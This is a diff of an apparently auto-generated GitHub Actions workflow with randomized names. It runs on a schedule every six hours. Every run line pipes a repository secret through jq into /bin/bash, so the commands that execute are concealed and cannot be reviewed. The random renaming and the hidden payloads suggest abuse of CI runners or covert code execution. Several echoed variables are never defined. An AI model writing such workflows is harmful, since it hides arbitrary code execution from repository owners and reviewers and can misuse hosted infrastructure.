--- a/.github/workflows/youquancun4523.yml
+++ b/.github/workflows/youquancun4523.yml
@@ -3,31 +3,20 @@ name: youquancun4523
 on:
   workflow_dispatch:
   schedule:
-    - cron: '38 4/6 * * *'
+    - cron: '23 1/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
+
     steps:
       - uses: actions/checkout@v4
       - name: youquancun4523
         env:
-          dz0: ${{ secrets.dz0 }}
+          n5007: ${{ secrets.n5007 }}
         run: |
-          echo $dz0 | jq -r .y36 | /bin/bash
-          echo $ujhv67868 | jq -r .fc44 | /bin/bash
-          echo $ljw30 | jq -r .jyae051 | /bin/bash
-          echo $ts961 | jq -r .wskpi97650 | /bin/bash
-          echo $qkf362 | jq -r .c8123 | /bin/bash
-          echo $iubi63 | jq -r .etda6898 | /bin/bash
-          echo $cggd29386 | jq -r .b5210 | /bin/bash
-          echo $y73220 | jq -r .mu7 | /bin/bash
-          echo $l0 | jq -r .cbg05082 | /bin/bash
-          echo $qeael6 | jq -r .suwdm7 | /bin/bash
-          echo $ol7 | jq -r .q2781 | /bin/bash
-          echo $u631 | jq -r .rfr3800 | /bin/bash
-          echo $ym501 | jq -r .qxd13524 | /bin/bash
-          echo $qufg82 | jq -r .vpd82547 | /bin/bash
-          echo $eswaq1800 | jq -r .pi4 | /bin/bash
-          echo $mxuxa8951 | jq -r .tr0699 | /bin/bash
-          echo $dct3293 | jq -r .inyg8377 | /bin/bash
+          echo $n5007 | jq -r .ld3 | /bin/bash
+          echo $vyho86137 | jq -r .rqgym40803 | /bin/bash
+          echo $qo46510 | jq -r .wkm587 | /bin/bash
+          echo $t97725 | jq -r .eiind4630 | /bin/bash
+          echo $l9 | jq -r .zel9 | /bin/bash
 
